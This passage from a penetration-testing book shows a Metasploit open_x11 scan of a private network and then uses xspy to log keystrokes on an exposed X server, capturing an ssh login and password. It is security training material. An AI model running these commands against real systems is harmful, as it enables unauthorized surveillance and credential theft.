Vulnerability Scanning
55
of archaic boxes out there are still running old, unpatched, and forgotten
operating systems. As you’ve seen in the preceding two examples, legacy sys-
tems are often the most vulnerable systems on a network.
To run the
open_x11
scanner, simply configure as you would most other
auxiliary modules by setting the
RHOSTS
and, optionally, the
THREADS
values. A
session is shown next. Notice at IP address 192.168.1.23 that the scanner has
found an open X server. This is a serious vulnerability because it allows an
attacker to gain unauthenticated access to the system: The X system handles
the GUI including the mouse and keyboard.
msf >
use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) >
show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 6000 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(open_x11) >
set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(open_x11) >
set THREADS 50
THREADS => 50
msf auxiliary(open_x11) >
run
[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32
. . . SNIP . . .
[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed
To see what an attacker could do with a vulnerability like this, start key-
stroke logging using Back|Track’s
xspy
tool, like so:
root@bt:/#
cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy#
./xspy -display 192.168.1.23:0 -delay 100
ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit